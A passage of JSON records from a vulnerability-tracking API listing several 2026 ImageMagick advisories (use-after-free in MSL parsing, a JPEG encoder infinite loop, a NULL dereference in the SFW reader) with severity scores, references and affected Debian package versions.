heap-use-after-free. The operation element handler replaces and frees the image while the parser continues reading from it, leading to a UAF in ReadBlobString during further parsing.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25983.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25983.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25983", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0819", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0822", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08062", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08076", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0818", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08197", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08218", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08227", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08209", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08141", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08147", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08193", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25983" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25983", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25983" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/257200cb21de23404dce5f8261871845d425dee5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/257200cb21de23404dce5f8261871845d425dee5" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwqw-2x5x-w566", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:04:31Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwqw-2x5x-w566" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25983", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25983" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442113", "reference_id": "2442113", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442113" }, { "reference_url": "https://github.com/advisories/GHSA-fwqw-2x5x-w566", "reference_id": "GHSA-fwqw-2x5x-w566", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fwqw-2x5x-w566" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25983", "GHSA-fwqw-2x5x-w566" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cbqr-aybx-d3e6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22606?format=api", "vulnerability_id": "VCID-cuhw-ew1g-s3h2", "summary": "ImageMagick has Heap Use-After-Free in ImageMagick MSL decoder\nA heap use-after-free vulnerability in ImageMagick's MSL decoder allows an attacker to trigger access to freed memory by crafting an MSL file.\n\n```\n=================================================================\n==1500633==ERROR: AddressSanitizer: heap-use-after-free on address 0x527000011550 at pc 0x5612583fa212 bp 0x7ffedb86d160 sp 0x7ffedb86d150\nREAD of size 8 at 0x527000011550 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28687.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28687.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28687", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17042", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16984", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16896", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17114", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17059", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18302", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.1852", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18472", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18421", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18365", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18377", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18402", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28687" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28687", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28687" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fpvf-frm6-625q", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-10T16:01:50Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fpvf-frm6-625q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28687", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28687" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445897", "reference_id": "2445897", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445897" }, { "reference_url": "https://github.com/advisories/GHSA-fpvf-frm6-625q", "reference_id": "GHSA-fpvf-frm6-625q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fpvf-frm6-625q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28687", "GHSA-fpvf-frm6-625q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cuhw-ew1g-s3h2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20981?format=api", "vulnerability_id": "VCID-d8yf-8rff-3yhf", "summary": "ImageMagick has a possible infinite loop in its JPEG encoder when using `jpeg:extent`\nA `continue` statement in the JPEG extent binary search loop in the jpeg encoder causes an infinite loop when writing persistently fails. An attacker can trigger a 100% CPU consumption and process hang (Denial of Service) with a crafted image.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26283.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26283.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26283", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05139", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05114", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04966", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04956", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05016", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05033", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05051", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05072", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05057", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05024", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04976", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05003", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26283" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26283", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26283" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/c448c6920a985872072fc7be6034f678c087de9b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c448c6920a985872072fc7be6034f678c087de9b" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gwr3-x37h-h84v", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T20:47:27Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gwr3-x37h-h84v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26283", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26283" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442140", "reference_id": "2442140", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442140" }, { "reference_url": "https://github.com/advisories/GHSA-gwr3-x37h-h84v", "reference_id": "GHSA-gwr3-x37h-h84v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gwr3-x37h-h84v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-26283", "GHSA-gwr3-x37h-h84v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yf-8rff-3yhf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22188?format=api", "vulnerability_id": "VCID-dtza-65ku-aber", "summary": "ImageMagick has NULL pointer dereference in ReadSFWImage after DestroyImageInfo (sfw.c)\nIn `ReadSFWImage()` (`coders/sfw.c`), when temporary file creation fails, `read_info` is destroyed before its `filename` member is accessed, causing a NULL pointer dereference and crash.\n\n```\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==1414421==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x56260222912f bp 0x7ffec0a193b0 sp 0x7ffec0a19360 T0)\n #0 0x56260222912f (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x235f12f)\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25795.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25795.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25795", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05323", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05285", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05133", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0513", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05185", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05199", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05216", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05248", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05229", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05197", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05177", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19112", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25795" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25795", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25795" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" 